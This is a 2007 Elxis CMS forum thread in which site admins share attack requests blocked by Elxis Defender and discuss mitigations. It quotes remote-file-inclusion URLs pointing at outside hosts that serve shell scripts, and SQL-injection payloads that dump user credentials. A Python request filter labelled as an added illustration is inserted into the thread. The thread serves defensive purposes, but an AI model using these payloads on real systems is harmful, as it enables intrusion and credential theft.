Elxis CMS Forum

Support => Security => Topic started by: datahell on September 30, 2007, 12:02:44

Title: Detected by Elxis defender exploits
Post by: datahell on September 30, 2007, 12:02:44
I saw a dangerous request today in the elxis.org logs and I need to tell everyone again the importance of having register_globals set to off and some PHP functions disabled.

The request (written in 3 lines):

/index.php?topic=996.0//index.php?
_REQUEST=&_REQUEST%5boption%5d=com_login&_REQUEST%5bItemid%5d=1&
GLOBALS=&mosConfig_absolute_path=http://bsnet.web.id/safe.txt?

Exploit: http://bsnet.web.id/safe.txt

Functions used:
disk_free_space, shell_exec, exec, system, passthru, popen, getcwd
Title: Re: Dangerous request
Post by: c8620p on September 30, 2007, 22:16:39
Ok, but if we set this option to OFF some of the components may stop working.
Should we always be afraid of something, or will something be safer in the new version (2008)?
Title: Re: Dangerous request
Post by: datahell on September 30, 2007, 23:13:32
ALL Elxis standard and Elxis compatible components work perfectly with register_globals off. Elxis does not need register_globals to be on. In the installation we say that very clearly. Elxis 2006.x and 2008.x are safe enough, but security is not only a matter of the CMS. It is also a matter of the CMS environment. Generally Elxis is very secure.

Elxis 2008.x has some more security enhancements:

1. Option to hide the administration login page!
2. Elxis defender became more effective.
3. Option to log the login attempts to the administration area (successful or not).
4. The whole frontend became more "solid", giving fewer privileges to users.
5. You can control access settings for any part of the administration area.
Title: Re: Dangerous request
Post by: Ivan Trebješanin on October 01, 2007, 00:47:02
Should we be always afraid ...
YES! It is wise to be cautious all the time, as you can never know what comes next in someone else's mind. And no CMS can be 100% safe if you leave your dirs or files on 777, or your server is misconfigured, for example. Elxis is the best CMS there ever was regarding security, but hey, there are a lot of pranksters out there, and some of them are smart.  ;)
Title: Re: Dangerous request
Post by: datahell on October 01, 2007, 07:46:05
Unfortunately there is no 100% secure application. Elxis is strong enough, but we can not guarantee absolute security. Even elxis.org can theoretically be hacked. For those of you who may not know it, joomla.org was hacked a month ago. As far as I know it was hacked due to a third-party component. The Elxis core is very secure as we continuously work on it, update it and make fixes where needed. Most security problems usually come from third-party applications and an insecure site environment. So, please take a look at these; we take care of Elxis.
Title: Re: Dangerous request
Post by: c8620p on October 02, 2007, 01:50:45
Sorry for the earlier post, but I think that I saw somewhere in an installation of a component (for Elxis) that RegisterGlobals MUST be set to ON. Maybe I'm wrong. In the meantime, thank you for your answer.
Title: Re: Dangerous request
Post by: datahell on October 03, 2007, 14:39:02
A new exploit/attack detected by Elxis Defender.

ATTACKER IP ADDRESS: 81.215.251.202
Country: Turkey (Izmir)
Exploit: http://animaliitaliani.com/x.dat?list=1&cmd=id (hosted in Italy)
Also here: http://georgiaeliteallstars.com/tool20.dat?list=1&cmd=id (hosted in USA)
DATE: 03-10-2007 01:56:57

Notice: New Elxis Defender sends you also the requested URI (if you have enabled e-mail notifications).
Title: New exploit detected
Post by: datahell on October 04, 2007, 22:51:24
New exploit detected by Elxis defender

ATTACKER IP ADDRESS: 85.25.30.127
ATTACK TYPE: XSS
ATTACKED COMPONENT: Elxis Core
COUNTRY: Germany
EXPLOIT: http://pastebin.ca/raw/725499? (hosted in Canada)
DATE: 04-10-2007 22:08:01

Notice: If you wish to have now the new version of Elxis Defender (available in Elxis 2008.x) send me a PM to send you the new version.

I will ONLY accept requests from:
- Elxis Team members
- Elxis community members
- People having support contracts with GO UP Inc
- GO UP Inc's affiliates and partners.
Title: Re: Detected by Elxis defender exploits
Post by: datahell on October 05, 2007, 14:59:40
ATTACKER IP ADDRESS: 217.65.240.14
Country: Ukraine (LVIVSKA OBLAST)
Exploit: http://usuarios.arnet.com.ar/larry123/safe.txt? (hosted in Argentina)
DATE: 05-10-2007 07:22:09
Title: Re: Detected by Elxis defender exploits
Post by: datahell on October 05, 2007, 18:48:55
ATTACKER IP ADDRESS: 207.150.191.62
Country: United States (California, Dixon)
Exploit: http://www.brandy-rose.com/members/id.txt?  (hosted in USA)
DATE: 05-10-2007 18:11:05
Title: Re: Detected by Elxis defender exploits
Post by: datahell on October 05, 2007, 21:58:58
ATTACKER IP ADDRESS: 209.59.205.211
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_mmsblog (joomla)
COUNTRY: United States (Washington, Bellevue)
EXPLOIT: http://www.kadastra.com/de/ec.txt? (hosted in Bulgaria)
DATE: 05-10-2007 21:19:15
Title: Re: Detected by Elxis defender exploits
Post by: datahell on October 05, 2007, 22:21:31
ATTACKER IP ADDRESS: 74.86.55.194
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_serverstat (joomla)
COUNTRY: USA (Illinois, Chicago)
EXPLOIT: http://www.brandy-rose.com/members/id.txt? (hosted in USA)
DATE: 05-10-2007 22:04:48
Title: Re: Detected by Elxis defender exploits
Post by: datahell on October 06, 2007, 09:12:35
ATTACKER IP ADDRESS: 67.18.228.34
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_mtree
COUNTRY: USA (Texas, Dallas)
EXPLOIT: http://tric.or.id/id.txt? (hosted in Indonesia)
DATE: 06-10-2007 02:10:04
ATTACKER IP ADDRESS: 81.214.175.110
ATTACK TYPE: XSS
ATTACKED COMPONENT: Elxis Core
COUNTRY: Turkey (Izmir)
EXPLOIT: http://animaliitaliani.com/x.dat?list=1&cmd=id (hosted in Italy)
DATE: 06-10-2007 07:22:54
Title: Re: Detected by Elxis defender exploits
Post by: datahell on October 17, 2007, 14:45:54
From the kind of attacks Elxis Defender blocks daily we see software that is possibly vulnerable.

So, here are 3 Joomla extensions with security problems:
module astatspro_show_2
bot multithumb
component ricettario (vulnerable in the backend too!)

We also have many attacks on the component mtree and especially on the savant files (there is an Elxis version available).

Having register_globals off, allow_url_fopen off, or setting mosConfig as a filter in Elxis Defender (version 2008) makes these attacks useless.

New exploits:
http://futurehousingsystems.com/images/control.txt
http://www.dunakom.hu/userimages/id.txt
http://www.cityvoice.biz/shop/pub/_vti/safe.txt
http://www.canalhip-hop.kit.net/id.txt
ftp://132.203.200.248 ( /nod32/new )
Title: Re: Detected by Elxis defender exploits
Post by: nikos65 on October 21, 2007, 08:59:52
Continuous attacks at  www[dot]hotel-astoria[dot]gr today

#   IP              Date                                  Filters
1   66.135.32.79    Sunday, 21 October 2007 07:38:18      mosConfig_
2   216.22.3.3      Sunday, 21 October 2007 07:42:04      mosConfig_
3   211.202.2.55    Sunday, 21 October 2007 08:08:58      mosConfig_

Two from the USA and one from Korea.
Title: Re: Detected by Elxis defender exploits
Post by: rman on October 23, 2007, 20:38:23
Good evening,
my system is also under constant attack:
...
229  62.2.177.147     Tuesday, 23 October 2007 13:05:18  mosConfig_
230  62.2.177.147     Tuesday, 23 October 2007 13:05:18  mosConfig_
231  219.94.145.104   Tuesday, 23 October 2007 13:05:50  mosConfig_
232  219.94.145.104   Tuesday, 23 October 2007 13:05:51  mosConfig_
233  219.94.145.104   Tuesday, 23 October 2007 13:05:51  mosConfig_
234  75.0.141.110     Tuesday, 23 October 2007 13:11:03  mosConfig_
235  75.0.141.110     Tuesday, 23 October 2007 13:11:04  mosConfig_
236  75.0.141.110     Tuesday, 23 October 2007 13:11:04  mosConfig_
237  84.246.4.133     Tuesday, 23 October 2007 13:16:37  mosConfig_
238  84.246.4.133     Tuesday, 23 October 2007 13:16:37  mosConfig_
239  84.246.4.133     Tuesday, 23 October 2007 13:16:38  mosConfig_
240  211.129.152.113  Tuesday, 23 October 2007 13:18:37  mosConfig_
241  211.129.152.113  Tuesday, 23 October 2007 13:27:32  mosConfig_
242  211.129.152.113  Tuesday, 23 October 2007 13:27:33  mosConfig_
243  211.129.152.113  Tuesday, 23 October 2007 13:27:33  mosConfig_

and these are only today's!
Also, most of the AdSense ads that appear on the pages (mainly the php ones) show advertisements about flood, exploits etc., without, of course, there being any corresponding content.
Do you have any idea how something like this can happen? And how it can be fixed, of course!

Title: Re: Detected by Elxis defender exploits
Post by: Ivan Trebješanin on October 25, 2007, 02:57:27
OK, here is my list for this week:

#  IP              Date                                     Filters
1  67.15.4.93      Saturday, 20 October 2007 21:09:52       mosConfig_
2  67.15.4.93      Saturday, 20 October 2007 21:09:59       mosConfig_
3  69.41.238.2     Saturday, 20 October 2007 21:12:42       mosConfig_
4  80.148.52.75    Wednesday, 24 October 2007 23:08:35      mosConfig_
5  199.233.91.129  Wednesday, 24 October 2007 23:09:20      mosConfig_
6  66.135.41.203   Wednesday, 24 October 2007 23:10:09      mosConfig_
7  199.233.91.129  Thursday, 25 October 2007 00:01:48       mosConfig_
8  80.148.52.75    Thursday, 25 October 2007 00:02:38       mosConfig_
9  66.135.41.203   Thursday, 25 October 2007 00:02:43       mosConfig_

And yes, I forgot, this is a list for elxis-srbija.org
Title: Re: Detected by Elxis defender exploits
Post by: datahell on October 25, 2007, 07:40:07
Why do I see a second attack from the same IP after a while? Haven't you enabled block IPs?
The most important thing in the logs is in the Defender notification e-mail: the requested URI (2008 version). From that URL we can see which component they try to attack.
Title: Re: Detected by Elxis defender exploits
Post by: Ivan Trebješanin on October 25, 2007, 11:47:30
I did not enable block IP, because once Defender blocked me.  :D

PS
Here is the mail I got this morning:
Do not reply to this e-mail
This is a notification e-mail from Elxis Defender

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 201.34.32.66
Requested URI: /index.php?option=com_content&task=view&id=46&Itemid=9/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.tcm-jaeggi.ch/id.txt?
DATE: 25-10-2007 08:16:59
Attack was logged

Note: Elxis Defender wont send you another notification for the next 5 minutes even if more attacks occured.

---------------------------------------------------
ELXIS DEFENDER by ELXIS Team
---------------------------------------------------


Title: Re: Detected by Elxis defender exploits
Post by: Ivan Trebješanin on November 05, 2007, 19:48:09
I post this because it was the first time someone tried to attack Elxis tool! Message from defender follows:
Do not reply to this e-mail
This is a notification e-mail from Elxis Defender

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 200.31.197.181 (blocked)
Requested URI: /index.php?option=com_content&task=section&id=3&Itemid=32/administrator/tools/floodblocker/language/english.php?mosConfig_absolute_path=http://www.unad.edu.co/induccion/site/modules/pr.txt??
DATE: 05-11-2007 15:19:56
Attack was logged

Note: Elxis Defender wont send you another notification for the next 5 minutes even if more attacks occured.

---------------------------------------------------
ELXIS DEFENDER by ELXIS Team
---------------------------------------------------

My question is: Is the mosConfig_ filter enough to protect components and tools? I think that every attack on a component, mambot etc. MUST have mosConfig involved. Correct me if I'm wrong?
Title: Re: Detected by Elxis defender exploits
Post by: datahell on November 05, 2007, 23:01:44
These attackers are just script kiddies. They know nothing about hacking. They use pre-made scripts and make blind attacks on huge lists of sites trying to find security holes and insecure site environments. 99.9% of these attacks get intercepted by a simple "mosconfig" filter. Elxis Defender (especially the 2008 version) does its job perfectly. As real hackers also exist, and someone may try to hack (for reasons I really don't understand) your own site, make sure to take a full database backup regularly via the Elxis database manager. For every action there is a reaction, so absolute security does not exist...
Title: Re: Detected by Elxis defender exploits
Post by: Ivan Trebješanin on November 05, 2007, 23:13:41
Yes, that's what I believe, too. If one man invents a lock, there must be another man to invent a lockpick. No particular reason. I consider the fact that someone has written a script to attack an Elxis tool as a compliment to Elxis.  :D
Title: Re: Detected by Elxis defender exploits
Post by: c8620p on November 06, 2007, 17:50:16
Hello from me.
This is what I saw when I activated Elxis Defender!!!
And this is only 3 days.
Think of a year!!!

#   IP              Date                                  Filters
1   83.149.87.190   Saturday, 03 November 2007 15:40:07   mosConfig_
2   83.149.87.190   Saturday, 03 November 2007 15:40:07   mosConfig_
3   200.31.197.181  Monday, 05 November 2007 16:20:07     mosConfig_
4   200.31.197.181  Monday, 05 November 2007 16:20:10     mosConfig_
5   200.31.197.181  Monday, 05 November 2007 16:34:17     mosConfig_
6   200.31.197.181  Monday, 05 November 2007 16:34:19     mosConfig_
7   64.118.86.20    Monday, 05 November 2007 16:37:59     mosConfig_
8   64.118.86.20    Monday, 05 November 2007 16:38:05     mosConfig_

(83.149.87.190) is located in Marina Del Rey, California, United States
(200.31.197.181) is located in Australia.
(64.118.86.20) is located in Australia.

I blocked them (I believe so)!!!
Title: Re: Detected by Elxis defender exploits
Post by: Ivan Trebješanin on November 06, 2007, 18:07:56
:D You got yourself a new spammer!
Title: Re: Detected by Elxis defender exploits
Post by: datahell on November 06, 2007, 18:13:03
I get about 20 messages by Elxis defender per day only from elxis.org...
Title: Re: Detected by Elxis defender exploits
Post by: Ivan Trebješanin on November 06, 2007, 18:18:37
I figured that all these attacks most probably come from some kids, but I am surprised that of all my 10 Elxis sites, only elxis-srbija.org is attacked 5-6 times a day.  ???
Title: Re: Detected by Elxis defender exploits
Post by: CREATIVE Options on November 08, 2007, 00:02:15
1. ATTACKER IP ADDRESS: 69.65.104.116
Country: USA - Washington DC
Exploit:
/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,concat(char(117,117,117,117,117,58),username,char(112,112,112,112,112,58),password,char(117,116,121,112,101,58),usertype,char(101,109,97,105,108,58),email,char(101,110,100,117,117,58)),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*
DATE: 07-11-2007 11:36:24

2. ATTACKER IP ADDRESS: 58.65.198.122
Country: Karachi in Pakistan
Exploit:
/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,concat(char(117,117,117,117,117,58),username,char(112,112,112,112,112,58),password,char(117,116,121,112,101,58),usertype,char(101,109,97,105,108,58),email,char(101,110,100,117,117,58)),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*
DATE: 07-11-2007 11:31:16


3. ATTACKER IP ADDRESS: 193.188.77.2
Country: Ar Ruşayfah in Jordan
Exploit:
/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,concat(char(117,117,117,117,117,58),username,char(112,112,112,112,112,58),password,char(117,116,121,112,101,58),usertype,char(101,109,97,105,108,58),email,char(101,110,100,117,117,58)),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*
DATE: 07-11-2007 11:48:49


All blocked by Elxis Defender
Title: Re: Detected by Elxis defender exploits
Post by: datahell on November 08, 2007, 08:04:44
These were SQL injection attempts against the component simplefaq (Joomla). Notice the asterisk comments ( /**/ ). In MySQL you can add comments inside a query. This way hackers try to confuse blocking scripts. For example, instead of writing "union select" they write "union /**/ select", which is exactly the same for MySQL but very difficult to detect and block. If we add a "select" filter in Elxis Defender there is the possibility of blocking ourselves if we write the word "select" in a post. So we try to use words that are MySQL specific, like "concat", "benchmark", "drop" and "elx_". We could also use the "union", "char" or "join" filters, but we should remember these filters when we write an article and either not use them or temporarily disable Defender.
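As an added illustration (not Elxis Defender's own code) of the filter trade-off described above, and of the mosConfig_absolute_path request from the first post: the request filter below strips the /**/ comments before matching, uses MySQL-specific words by default, and shows how the stricter "union"/"char" list also trips on an ordinary article. The sample requests are constructed and modelled on the ones quoted in this thread; the filter names and word lists are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Word filters in the spirit of the Defender list discussed above. "select" is
# deliberately absent: an editor writing that word in an article would block
# themselves, so the default list sticks to MySQL-specific words and the
# Elxis table prefix (assumed filter set).
MYSQL_WORDS = ("concat", "benchmark", "drop", "elx_")
# Stricter list: catches more, but may trip on ordinary prose (see LEGIT_REQUEST).
STRICT_WORDS = MYSQL_WORDS + ("union", "char")


def normalize(uri):
    """URL-decode (twice, for double-encoded payloads) and strip /* ... */ comments.

    MySQL ignores these comments, so "union/**/select" and "union select" are
    the same query; a filter has to compare the stripped, lower-cased form.
    """
    text = unquote_plus(unquote_plus(uri))
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()


def matched_filters(uri, words=MYSQL_WORDS):
    """Return the names of the Defender-style filters the request trips, in order."""
    text = normalize(uri)
    hits = []
    if "mosconfig_" in text:
        hits.append("mosConfig_")   # register_globals / remote-include probe
    if re.search(r"=(?:https?|ftp)://", text):
        hits.append("=http")        # a URL handed to a parameter (needs allow_url_fopen)
    hits += [w for w in words if re.search(r"\b" + re.escape(w), text)]
    return hits


# Constructed sample requests (not real log lines) modelled on this thread.
RFI_REQUEST = ("/index.php?_REQUEST%5boption%5d=com_login&GLOBALS=&"
               "mosConfig_absolute_path=http://example.invalid/safe.txt?")
SQLI_REQUEST = ("/index.php?option=com_simplefaq&task=answer&aid=-1/**/union/**/select/**/"
                "0,username,concat(char(58),username,char(58),password)/**/from/**/jos_users/*")
LEGIT_REQUEST = ("/index.php?option=com_content&task=save&introtext="
                 "Please+select+the+trade+union+you+belong+to")

if __name__ == "__main__":
    for name, uri in (("rfi", RFI_REQUEST), ("sqli", SQLI_REQUEST), ("legit", LEGIT_REQUEST)):
        print(name, "default:", matched_filters(uri),
              "strict:", matched_filters(uri, STRICT_WORDS))
```

With the default list the article save is left alone while both attacks are caught; with the strict list the same article is blocked on "union", which is the self-blocking case the post warns about.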
Title: Re: Detected by Elxis defender exploits
Post by: CREATIVE Options on November 23, 2007, 12:54:12
ATTACKER IP ADDRESS: 219.93.178.162 (blocked)
Requested URI:
/index2.php?option=com_contact&task=vcard&contact_id=4&no_html=http://www.10namicro.com/demo/project/lib/adodb/guxav/qenahey/
DATE: 23-11-2007 04:45:43

ATTACKER IP ADDRESS: 85.214.26.131
Requested URI: ADODB
DATE: 23-11-2007 00:48:51

ATTACKER IP ADDRESS: 217.144.201.107 (blocked)
Requested URI:
/index.php?option=com_content&task=blogsection&id=0&Itemid=92&limit=http://www.10namicro.com/demo/project/lib/adodb/guxav/qenahey/&limitstart=75
DATE: 22-11-2007 23:29:51

Title: Re: Detected by Elxis defender exploits
Post by: Ivan Trebješanin on November 23, 2007, 22:03:19
A very similar attack happened to me.... I have added =http to the filter list, and hopefully this will stop this kind of attack.
Title: Re: Detected by Elxis defender exploits
Post by: datahell on November 23, 2007, 23:47:17
If you have allow_url_fopen set to off in your PHP settings these attacks are useless.
Title: Re: Detected by Elxis defender exploits
Post by: Ivan Trebješanin on November 24, 2007, 00:25:13
Yes, but my hosting server is configured to have allow_url_fopen set to on. So, I hope that adding the =http filter to Elxis Defender should solve this. Otherwise, I must call the administrator to turn it off.